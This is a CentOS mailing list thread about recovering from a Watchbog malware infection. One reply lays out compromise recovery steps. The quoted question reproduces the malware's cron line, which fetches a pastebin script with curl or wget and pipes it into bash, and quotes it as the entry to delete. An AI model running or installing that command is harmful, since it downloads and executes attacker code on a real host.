On 12/17/18 2:57 PM, Mauricio Tavares wrote: > On Sat, Dec 15, 2018 at 12:40 PM Kaushal Shriyan > <kaushalshriyan at gmail.com> wrote: >> >> Hi, >> >> Is there a way to find out how the CentOS 7.5 Linux box got infected with >> malware? >> Currently i am referring to >> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html >> to carry out the below steps and is done manually. >> >> 1)rm -fr /tmp/*timesyncc.service* >> 2)crontab -e -u apigee >> delete the cron entry >> */1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- >> https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1 >> 3)ps aux | grep watchbog >> kill -9 pidof watchbog >> >> Any suggestions or recommendations to find out how CentOS 7.5 Linux box got >> infected with Watchbog Malware. Is there any open source software which can > > do you have untampered log files? > >> be installed on CentOS 7.5 Linux box to detect and prevent Malware? Standard compromise recovery procedure since forever is (your local policy my have slightly different order about notifications and similar): 1. back up all user data 2. Wipe hard drive or whatever storage system you have (some malware potentially can flush itself instead of BIOS, but I haven't seen any of really existing actually do that - experts probably will chime in here) 3. Freshly re-install system, update, configure with all security precautions in mind, restore users and user data 4. Fresh sshd installation takes care of generation of new server key pair, just don't copy and re-use old pair 5. Revoke old SSL certificate(s), and recreate and sign new one(s) - with new secret key 6. Notify superiors and all users about compromise; stress that users have to change their password and key pair(s) on this machine, and should consider compromised their accounts on machines they connected to from this machine after compromise happened. As thorough forensics often takes longer that two weeks, so you can not tell right away exact date of original compromise (not the obvious one you see on the surface now), suggest they change passwords (and key pairs) on machines they ever connected from compromised one. And make them aware that they should apply it as a chain (about account on machines further in the chain of connections). To prevent re-occurrence of the above: update, update, update. Never install anything that is not coming from the source you trust, anything that is not downloaded by yourself from trusted source. Paranoia is in sysadmin's job description. Install host based intrusion detection system. Do your own research and chose what is suitable your situation. I hope this helps. Valeri >> >> Thanks in Advance. >> >> Best Regards, >> >> Kaushal >> _______________________________________________ >> CentOS mailing list >> CentOS at centos.org >> https://lists.centos.org/mailman/listinfo/centos > _______________________________________________ > CentOS mailing list > CentOS at centos.org > https://lists.centos.org/mailman/listinfo/centos > -- ++++++++++++++++++++++++++++++++++++++++ Valeri Galtsev Sr System Administrator Department of Astronomy and Astrophysics Kavli Institute for Cosmological Physics University of Chicago Phone: 773-702-4247 ++++++++++++++++++++++++++++++++++++++++